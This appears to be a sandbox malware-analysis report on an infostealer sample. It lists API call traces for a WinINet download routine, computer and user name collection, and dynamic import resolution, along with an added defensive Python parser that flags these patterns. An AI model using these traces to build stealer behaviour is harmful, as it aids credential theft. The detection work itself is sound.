                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: (Wg$NtQueryInformationProcess
                                  • API String ID: 2238633743-613721733
                                  • Opcode ID: d54117406967a3d658e1754ec719a67322245bef4101eb9ec6b4957ad63ec957
                                  • Instruction ID: a1d28491bd065f3c6897343591019caaae22597e40c4b765b33a9e738e7c5a59
                                  • Opcode Fuzzy Hash: d54117406967a3d658e1754ec719a67322245bef4101eb9ec6b4957ad63ec957
                                  • Instruction Fuzzy Hash: 17A14CB5508240AFD354EFA8FD88B6E37F9F74C301F54471AE689D36A4DA3A9841CB12

                                  Control-flow Graph

                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A7460E
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00A7479C
                                  Strings
                                   • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs (30): 00A745C7, 00A745D2, 00A745DD, 00A745E8, 00A745F3, 00A74617, 00A74622, 00A7462D, 00A74638, 00A74643, 00A74657, 00A74662, 00A7466D, 00A74678, 00A74683, 00A746AC, 00A746B7, 00A746C2, 00A746CD, 00A746D8, 00A74713, 00A7471E, 00A74729, 00A74734, 00A7473F, 00A7474F, 00A7475A, 00A74765, 00A74770, 00A7477B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                   • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (this sentence repeated 30 times, '$'-separated, once per xref listed under Strings)
                                  • API String ID: 1542196881-2218711628
                                  • Opcode ID: 1ec63368ac90290df2651a419ecfb432a7f3223f3cc3d456fa92e8a319e767e3
                                  • Instruction ID: 2208ab4b215d7829a1ba45658ecc6d45c7bbef31fd69ca975d7465c8b1b000d8
                                  • Opcode Fuzzy Hash: 1ec63368ac90290df2651a419ecfb432a7f3223f3cc3d456fa92e8a319e767e3
                                  • Instruction Fuzzy Hash: 7B414629BC67047AEE3DBFB58843F9D77DB7F4674AF505840AC2412398CBB069806712

                                   Control-flow Graph (the rendered graph and its executed / not executed colouring are not preserved in the text export; basic blocks and edges recovered from the graph data)
                                   • 1012: a76280-a7630b, call a8a7a0, call a747b0, call a8a740, InternetOpenA, StrCmpCA → 1019, 1020
                                   • 1019: a76314-a76318 → 1021, 1022
                                   • 1020: a7630d → 1019
                                   • 1021: a7631e-a76342, InternetConnectA → 1023, 1024
                                   • 1022: a76509-a76525, call a8a7a0, call a8a800 (×2) → 1040
                                   • 1023: a764ff-a76503, InternetCloseHandle → 1022
                                   • 1024: a76348-a7634c → 1026, 1027
                                   • 1026: a7634e-a76358 → 1029
                                   • 1027: a7635a → 1029
                                   • 1029: a76364-a76392, HttpOpenRequestA → 1032, 1033
                                   • 1032: a764f5-a764f9, InternetCloseHandle → 1023
                                   • 1033: a76398-a7639c → 1035, 1036
                                   • 1035: a763c5-a76405, HttpSendRequestA, HttpQueryInfoA → 1038, 1039
                                   • 1036: a7639e-a763bf, InternetSetOptionA → 1035
                                   • 1038: a76407-a76427, call a8a740, call a8a800 (×2) → 1040
                                   • 1039: a7642c-a7644b, call a88940 → 1045, 1046
                                   • 1040: a76528-a7652d (no successors in the graph)
                                   • 1045: a7644d-a76454 → 1050, 1051
                                   • 1046: a764c9-a764e9, call a8a740, call a8a800 (×2) → 1040
                                   • 1050: a764c7-a764ef, InternetCloseHandle → 1032
                                   • 1051: a76456-a76480, InternetReadFile → 1055, 1056
                                   • 1055: a76482-a76489 → 1056, 1059
                                   • 1056: a7648b → 1050
                                   • 1059: a7648d-a764c5, call a8a9b0, call a8a8a0, call a8a800 → 1051 (read loop)
                                  APIs
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                    • Part of subcall function 00A747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A74839
                                    • Part of subcall function 00A747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A74849
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  • InternetOpenA.WININET(00A90DFE,00000001,00000000,00000000,00000000), ref: 00A762E1
                                  • StrCmpCA.SHLWAPI(?,0068F400), ref: 00A76303
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A76335
                                  • HttpOpenRequestA.WININET(00000000,GET,?,0068EC88,00000000,00000000,00400100,00000000), ref: 00A76385
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A763BF
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A763D1
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00A763FD
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00A7646D
                                  • InternetCloseHandle.WININET(00000000), ref: 00A764EF
                                  • InternetCloseHandle.WININET(00000000), ref: 00A764F9
                                  • InternetCloseHandle.WININET(00000000), ref: 00A76503
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: 274589c5445d171c9d41792a794e0697e524f225ecc7565f15a28a4e95d447aa
                                  • Instruction ID: f804dd77b314b8bce77a0f614d37f35a7d24df553debbde1d7075b825a00a33b
                                  • Opcode Fuzzy Hash: 274589c5445d171c9d41792a794e0697e524f225ecc7565f15a28a4e95d447aa
                                  • Instruction Fuzzy Hash: 80714F71A00218ABEF24EFA0DD49FEE77B8BB44700F108199F109AB5D0DBB56A85CF51
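The routine at 00A76280 above is a complete WinINet fetch, and the raw hex in its APIs list decodes to documented constants: InternetOpenA with access type 1 (INTERNET_OPEN_TYPE_DIRECT), InternetConnectA with service 3 (INTERNET_SERVICE_HTTP), HttpOpenRequestA with verb GET and flags 0x00400100 (INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE), InternetSetOptionA with option 0x1F (INTERNET_OPTION_SECURITY_FLAGS; the 4-byte value was not recovered), HttpQueryInfoA with level 0x13 (HTTP_QUERY_STATUS_CODE), and a loop reading 0x7CF (1999) bytes per InternetReadFile call. The Python below is an added example, not code from the Joe Sandbox report or from the Stealc sample: it parses report lines of the form shown above (copied here as constructed input), decodes the constants, checks that the download chain occurs in address order, and counts GetProcAddress calls per module handle as a crude measure of the dynamic import resolution seen in the resolver at 00A89C10 further down this report. The chain definition and the density threshold are assumptions of this example, not anything the report states.

```python
"""Added example, not code from the Joe Sandbox report or the Stealc sample:
parse the report's 'APIs' lines, decode the WinINet constants the report prints
as raw hex, and flag the GET-download chain and dense GetProcAddress use."""
import re
from collections import Counter

# Documented values from wininet.h; the names do not appear in the report.
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
INTERNET_OPTION_SECURITY_FLAGS = 0x1F  # InternetSetOptionA dwOption 31
HTTP_QUERY_STATUS_CODE = 0x13          # HttpQueryInfoA dwInfoLevel 19

# Constructed input: lines copied from the 'APIs' listings in this report.
SAMPLE_APIS = """
• Part of subcall function 00A747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A74849
• InternetOpenA.WININET(00A90DFE,00000001,00000000,00000000,00000000), ref: 00A762E1
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A76335
• HttpOpenRequestA.WININET(00000000,GET,?,0068EC88,00000000,00000000,00400100,00000000), ref: 00A76385
• InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A763BF
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A763D1
• HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00A763FD
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00A7646D
• GetProcAddress.KERNEL32(77190000,00675428), ref: 00A89C2D
• GetProcAddress.KERNEL32(77190000,00675448), ref: 00A89C45
"""

API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

def parse_arg(tok):
    """'?' means the sandbox could not recover the value; 8 hex digits are a DWORD."""
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok  # a resolved literal such as GET

def parse_api_lines(text):
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        raw = m.group("args").strip()
        calls.append({
            "api": m.group("api"), "module": m.group("module"),
            "args": [parse_arg(t) for t in raw.split(",")] if raw else [],
            "ref": int(m.group("ref"), 16),
            # 'Part of subcall function' lines belong to a callee, not this function
            "subcall": "Part of subcall" in line,
        })
    return calls

def decode_bits(value, table):
    """Name every bit of value that the table knows, in table order."""
    return [name for bit, name in table.items() if value & bit]

DOWNLOAD_CHAIN = ["InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                  "HttpSendRequestA", "InternetReadFile"]

def find_wininet_download(calls):
    """Summarise the WinINet download chain if its calls occur in address order, else None."""
    own = sorted((c for c in calls if not c["subcall"]), key=lambda c: c["ref"])
    hits, want = {}, 0
    for c in own:
        if want < len(DOWNLOAD_CHAIN) and c["api"] == DOWNLOAD_CHAIN[want]:
            hits[c["api"]] = c
            want += 1
    if want < len(DOWNLOAD_CHAIN):
        return None
    open_args = hits["HttpOpenRequestA"]["args"]  # hConnect, verb, object, version, ..., flags
    flags = open_args[6] if len(open_args) > 6 and isinstance(open_args[6], int) else 0
    summary = {
        "verb": open_args[1],
        "open_request_flags": decode_bits(flags, INTERNET_FLAGS),
        "sets_security_flags": False, "checks_status_code": False, "read_chunk": None,
    }
    for c in own:
        a = c["args"]
        if c["api"] == "InternetSetOptionA" and len(a) > 1 and a[1] == INTERNET_OPTION_SECURITY_FLAGS:
            summary["sets_security_flags"] = True  # the flag value itself is '?' in the report
        elif c["api"] == "HttpQueryInfoA" and len(a) > 1 and a[1] == HTTP_QUERY_STATUS_CODE:
            summary["checks_status_code"] = True
        elif c["api"] == "InternetReadFile" and len(a) > 2:
            summary["read_chunk"] = a[2]
    return summary

def getprocaddress_density(calls, threshold=8):
    """Count GetProcAddress calls per module handle; the threshold is an assumed cut-off."""
    per_handle = Counter(c["args"][0] for c in calls
                         if c["api"] == "GetProcAddress" and c["args"])
    return {h: n for h, n in per_handle.items() if n >= threshold}
```

On the two listings copied into SAMPLE_APIS this reports a GET chain with INTERNET_FLAG_KEEP_CONNECTION and INTERNET_FLAG_PRAGMA_NOCACHE, a status-code check, a 1999-byte read chunk, and two GetProcAddress calls against handle 0x77190000 (the full resolver block at a89c20 makes 43 such calls, so the default threshold of 8 would trip on the real listing). Arguments the report prints as '?' are kept as None so that an unrecovered value is never mistaken for zero.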

                                   Control-flow Graph (the rendered graph and its executed / not executed colouring are not preserved in the text export; basic blocks and edges recovered from the graph data)
                                   • 1275: a878e0-a87937, GetProcessHeap, RtlAllocateHeap, GetComputerNameA → 1276, 1277
                                   • 1276: a87939-a8793e → 1278
                                   • 1277: a87942-a87945 → 1278
                                   • 1278: a87962-a87972 (no successors in the graph)
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A87910
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A87917
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 00A8792F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: 8f88741216c634147681afa85c0c6fc063c2248432ebb20d0e2bbc1731aed34d
                                  • Instruction ID: 50e6b3d0eb1c8909134c0fa560a077a4b7c9a656c23f727736d1207ea4c48734
                                  • Opcode Fuzzy Hash: 8f88741216c634147681afa85c0c6fc063c2248432ebb20d0e2bbc1731aed34d
                                  • Instruction Fuzzy Hash: 7E01A9B1A04204EFC740DF94DD45FAEBBB8F704B21F104219F555E36C0D37559408BA1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A711B7), ref: 00A87880
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A87887
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A8789F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: e8c09e220b08f8781ef5b5a4a6c5a69032605db58eea88f8271bfae9dfe40828
                                  • Instruction ID: 79b7506ae8edbeebe402d208f4f4c01c9ed5d27d835b1152c61f3afb180fb895
                                  • Opcode Fuzzy Hash: e8c09e220b08f8781ef5b5a4a6c5a69032605db58eea88f8271bfae9dfe40828
                                  • Instruction Fuzzy Hash: 4DF04FB1944208ABC700DF98DD49FAEBBB8FB04711F10065AFA05A2680C77559048BA1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: e93a74fa5e64b3a044bed4d863d12dfac3acd9617880cc21fb5fbf5270e4d7e3
                                  • Instruction ID: 308a9962e622f41d15a917c2dbd6d88cfb4d3e50480c5603c6907ace522de8e0
                                  • Opcode Fuzzy Hash: e93a74fa5e64b3a044bed4d863d12dfac3acd9617880cc21fb5fbf5270e4d7e3
                                  • Instruction Fuzzy Hash: 57D05E7490430CDBCB00DFE0DC497DDBBB8FB0C321F000698D90572340EA315481CAA6

                                   Control-flow Graph (the rendered graph and its executed / not executed colouring are not preserved in the text export; basic blocks and edges recovered from the graph data)
                                   • 633: a89c10-a89c1a → 634, 635
                                   • 634: a89c20-a8a031, GetProcAddress (×43) → 635
                                   • 635: a8a036-a8a0ca, LoadLibraryA (×8) → 636, 637
                                   • 636: a8a0cc-a8a141, GetProcAddress (×5) → 637
                                   • 637: a8a146-a8a14d → 638, 639
                                   • 638: a8a153-a8a211, GetProcAddress (×8) → 639
                                   • 639: a8a216-a8a21d → 640, 641
                                   • 640: a8a298-a8a29f → 642, 643
                                   • 641: a8a21f-a8a293, GetProcAddress (×5) → 640
                                   • 642: a8a2a5-a8a332, GetProcAddress (×6) → 643
                                   • 643: a8a337-a8a33e → 644, 645
                                   • 644: a8a41f-a8a426 → 646, 647
                                   • 645: a8a344-a8a41a, GetProcAddress (×9) → 644
                                   • 646: a8a428-a8a49d, GetProcAddress (×5) → 647
                                   • 647: a8a4a2-a8a4a9 → 648, 649
                                   • 648: a8a4ab-a8a4d7, GetProcAddress (×2) → 649
                                   • 649: a8a4dc-a8a4e3 → 650, 651
                                   • 650: a8a515-a8a51c → 652, 653
                                   • 651: a8a4e5-a8a510, GetProcAddress (×2) → 650
                                   • 652: a8a612-a8a619 → 654, 655
                                   • 653: a8a522-a8a60d, GetProcAddress (×10) → 652
                                   • 654: a8a61b-a8a678, GetProcAddress (×4) → 655
                                   • 655: a8a67d-a8a684 → 656, 657
                                   • 656: a8a69e-a8a6a5 → 658, 659
                                   • 657: a8a686-a8a699, GetProcAddress → 656
                                   • 658: a8a708-a8a709 (no successors in the graph)
                                   • 659: a8a6a7-a8a703, GetProcAddress (×4) → 658
                                  APIs
                                  • GetProcAddress.KERNEL32(77190000,00675428), ref: 00A89C2D
                                  • GetProcAddress.KERNEL32(77190000,00675448), ref: 00A89C45
                                  • GetProcAddress.KERNEL32(77190000,00689080), ref: 00A89C5E
                                  • GetProcAddress.KERNEL32(77190000,00689050), ref: 00A89C76
                                  • GetProcAddress.KERNEL32(77190000,00688FC0), ref: 00A89C8E
                                  • GetProcAddress.KERNEL32(77190000,0068D530), ref: 00A89CA7
                                  • GetProcAddress.KERNEL32(77190000,0067A6B8), ref: 00A89CBF
                                  • GetProcAddress.KERNEL32(77190000,0068D500), ref: 00A89CD7
                                  • GetProcAddress.KERNEL32(77190000,0068D5C0), ref: 00A89CF0
                                  • GetProcAddress.KERNEL32(77190000,0068D560), ref: 00A89D08
                                  • GetProcAddress.KERNEL32(77190000,0068D4D0), ref: 00A89D20
                                  • GetProcAddress.KERNEL32(77190000,00675608), ref: 00A89D39
                                  • GetProcAddress.KERNEL32(77190000,006756A8), ref: 00A89D51
                                  • GetProcAddress.KERNEL32(77190000,00675648), ref: 00A89D69
                                  • GetProcAddress.KERNEL32(77190000,00675668), ref: 00A89D82
                                  • GetProcAddress.KERNEL32(77190000,0068D578), ref: 00A89D9A
                                  • GetProcAddress.KERNEL32(77190000,0068D440), ref: 00A89DB2
                                  • GetProcAddress.KERNEL32(77190000,0067A938), ref: 00A89DCB
                                  • GetProcAddress.KERNEL32(77190000,006753C8), ref: 00A89DE3
                                  • GetProcAddress.KERNEL32(77190000,0068D548), ref: 00A89DFB
                                  • GetProcAddress.KERNEL32(77190000,0068D590), ref: 00A89E14
                                  • GetProcAddress.KERNEL32(77190000,0068D4B8), ref: 00A89E2C
                                  • GetProcAddress.KERNEL32(77190000,0068D608), ref: 00A89E44
                                  • GetProcAddress.KERNEL32(77190000,006756C8), ref: 00A89E5D
                                  • GetProcAddress.KERNEL32(77190000,0068D368), ref: 00A89E75
                                  • GetProcAddress.KERNEL32(77190000,0068D620), ref: 00A89E8D
                                  • GetProcAddress.KERNEL32(77190000,0068D5A8), ref: 00A89EA6
                                  • GetProcAddress.KERNEL32(77190000,0068D428), ref: 00A89EBE
                                  • GetProcAddress.KERNEL32(77190000,0068D518), ref: 00A89ED6
                                  • GetProcAddress.KERNEL32(77190000,0068D5D8), ref: 00A89EEF
                                  • GetProcAddress.KERNEL32(77190000,0068D5F0), ref: 00A89F07
                                  • GetProcAddress.KERNEL32(77190000,0068D398), ref: 00A89F1F
                                  • GetProcAddress.KERNEL32(77190000,0068D458), ref: 00A89F38
                                  • GetProcAddress.KERNEL32(77190000,0067FD48), ref: 00A89F50
                                  • GetProcAddress.KERNEL32(77190000,0068D3F8), ref: 00A89F68
                                  • GetProcAddress.KERNEL32(77190000,0068D380), ref: 00A89F81
                                  • GetProcAddress.KERNEL32(77190000,00675708), ref: 00A89F99
                                  • GetProcAddress.KERNEL32(77190000,0068D338), ref: 00A89FB1
                                  • GetProcAddress.KERNEL32(77190000,006753A8), ref: 00A89FCA
                                  • GetProcAddress.KERNEL32(77190000,0068D470), ref: 00A89FE2
                                  • GetProcAddress.KERNEL32(77190000,0068D350), ref: 00A89FFA
                                  • GetProcAddress.KERNEL32(77190000,00675548), ref: 00A8A013
                                  • GetProcAddress.KERNEL32(77190000,006753E8), ref: 00A8A02B
                                  • LoadLibraryA.KERNEL32(0068D3B0,?,00A85CA3,00A90AEB,?,?,?,?,?,?,?,?,?,?,00A90AEA,00A90AE3), ref: 00A8A03D
                                  • LoadLibraryA.KERNEL32(0068D3C8,?,00A85CA3,00A90AEB,?,?,?,?,?,?,?,?,?,?,00A90AEA,00A90AE3), ref: 00A8A04E
                                  • LoadLibraryA.KERNEL32(0068D3E0,?,00A85CA3,00A90AEB,?,?,?,?,?,?,?,?,?,?,00A90AEA,00A90AE3), ref: 00A8A060
                                  • LoadLibraryA.KERNEL32(0068D4E8,?,00A85CA3,00A90AEB,?,?,?,?,?,?,?,?,?,?,00A90AEA,00A90AE3), ref: 00A8A072
                                  • LoadLibraryA.KERNEL32(0068D410,?,00A85CA3,00A90AEB,?,?,?,?,?,?,?,?,?,?,00A90AEA,00A90AE3), ref: 00A8A083
                                  • LoadLibraryA.KERNEL32(0068D488,?,00A85CA3,00A90AEB,?,?,?,?,?,?,?,?,?,?,00A90AEA,00A90AE3), ref: 00A8A095
                                  • LoadLibraryA.KERNEL32(0068D4A0,?,00A85CA3,00A90AEB,?,?,?,?,?,?,?,?,?,?,00A90AEA,00A90AE3), ref: 00A8A0A7
                                  • LoadLibraryA.KERNEL32(0068D710,?,00A85CA3,00A90AEB,?,?,?,?,?,?,?,?,?,?,00A90AEA,00A90AE3), ref: 00A8A0B8
                                  • GetProcAddress.KERNEL32(77040000,006750C8), ref: 00A8A0DA
                                  • GetProcAddress.KERNEL32(77040000,0068D680), ref: 00A8A0F2
                                  • GetProcAddress.KERNEL32(77040000,00688B38), ref: 00A8A10A
                                  • GetProcAddress.KERNEL32(77040000,0068D698), ref: 00A8A123
                                  • GetProcAddress.KERNEL32(77040000,006752A8), ref: 00A8A13B
                                  • GetProcAddress.KERNEL32(70630000,0067A668), ref: 00A8A160
                                  • GetProcAddress.KERNEL32(70630000,00675208), ref: 00A8A179
                                  • GetProcAddress.KERNEL32(70630000,0067A758), ref: 00A8A191
                                  • GetProcAddress.KERNEL32(70630000,0068D6E0), ref: 00A8A1A9
                                  • GetProcAddress.KERNEL32(70630000,0068D740), ref: 00A8A1C2
                                  • GetProcAddress.KERNEL32(70630000,00674FE8), ref: 00A8A1DA
                                  • GetProcAddress.KERNEL32(70630000,00675148), ref: 00A8A1F2
                                  • GetProcAddress.KERNEL32(70630000,0068D7D0), ref: 00A8A20B
                                  • GetProcAddress.KERNEL32(768D0000,00675288), ref: 00A8A22C
                                  • GetProcAddress.KERNEL32(768D0000,00675168), ref: 00A8A244
                                  • GetProcAddress.KERNEL32(768D0000,0068D6C8), ref: 00A8A25D
                                  • GetProcAddress.KERNEL32(768D0000,0068D6F8), ref: 00A8A275
                                  • GetProcAddress.KERNEL32(768D0000,00675008), ref: 00A8A28D
                                  • GetProcAddress.KERNEL32(75790000,0067A898), ref: 00A8A2B3
                                  • GetProcAddress.KERNEL32(75790000,0067A848), ref: 00A8A2CB
                                  • GetProcAddress.KERNEL32(75790000,0068D6B0), ref: 00A8A2E3
                                  • GetProcAddress.KERNEL32(75790000,00675048), ref: 00A8A2FC
                                  • GetProcAddress.KERNEL32(75790000,006751E8), ref: 00A8A314
                                  • GetProcAddress.KERNEL32(75790000,0067A730), ref: 00A8A32C
                                  • GetProcAddress.KERNEL32(75A10000,0068D788), ref: 00A8A352
                                  • GetProcAddress.KERNEL32(75A10000,006750E8), ref: 00A8A36A
                                  • GetProcAddress.KERNEL32(75A10000,00688C78), ref: 00A8A382
                                  • GetProcAddress.KERNEL32(75A10000,0068D758), ref: 00A8A39B
                                  • GetProcAddress.KERNEL32(75A10000,0068D728), ref: 00A8A3B3
                                  • GetProcAddress.KERNEL32(75A10000,006751C8), ref: 00A8A3CB
                                  • GetProcAddress.KERNEL32(75A10000,00675128), ref: 00A8A3E4
                                  • GetProcAddress.KERNEL32(75A10000,0068D638), ref: 00A8A3FC
                                  • GetProcAddress.KERNEL32(75A10000,0068D7E8), ref: 00A8A414
                                  • GetProcAddress.KERNEL32(76850000,006751A8), ref: 00A8A436
                                  • GetProcAddress.KERNEL32(76850000,0068D770), ref: 00A8A44E
                                  • GetProcAddress.KERNEL32(76850000,0068D7A0), ref: 00A8A466
                                  • GetProcAddress.KERNEL32(76850000,0068D7B8), ref: 00A8A47F
                                  • GetProcAddress.KERNEL32(76850000,0068D650), ref: 00A8A497
                                  • GetProcAddress.KERNEL32(75690000,00675228), ref: 00A8A4B8
                                  • GetProcAddress.KERNEL32(75690000,00675248), ref: 00A8A4D1
                                  • GetProcAddress.KERNEL32(769C0000,00674FC8), ref: 00A8A4F2
                                  • GetProcAddress.KERNEL32(769C0000,0068D668), ref: 00A8A50A
                                  • GetProcAddress.KERNEL32(6F8C0000,00675268), ref: 00A8A530
                                  • GetProcAddress.KERNEL32(6F8C0000,00675108), ref: 00A8A548
                                  • GetProcAddress.KERNEL32(6F8C0000,00675188), ref: 00A8A560
                                  • GetProcAddress.KERNEL32(6F8C0000,0068D128), ref: 00A8A579
                                  • GetProcAddress.KERNEL32(6F8C0000,00675348), ref: 00A8A591
                                  • GetProcAddress.KERNEL32(6F8C0000,00675068), ref: 00A8A5A9
                                  • GetProcAddress.KERNEL32(6F8C0000,00675088), ref: 00A8A5C2
                                  • GetProcAddress.KERNEL32(6F8C0000,00675028), ref: 00A8A5DA
                                  • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00A8A5F1
                                  • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00A8A607
                                  • GetProcAddress.KERNEL32(75D90000,0068D278), ref: 00A8A629
                                  • GetProcAddress.KERNEL32(75D90000,00688B48), ref: 00A8A641
                                  • GetProcAddress.KERNEL32(75D90000,0068D260), ref: 00A8A659
                                  • GetProcAddress.KERNEL32(75D90000,0068D0C8), ref: 00A8A672
                                  • GetProcAddress.KERNEL32(76470000,00675328), ref: 00A8A693
                                  • GetProcAddress.KERNEL32(70220000,0068D140), ref: 00A8A6B4
                                  • GetProcAddress.KERNEL32(70220000,006750A8), ref: 00A8A6CD
                                  • GetProcAddress.KERNEL32(70220000,0068D068), ref: 00A8A6E5
                                  • GetProcAddress.KERNEL32(70220000,0068D1E8), ref: 00A8A6FD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
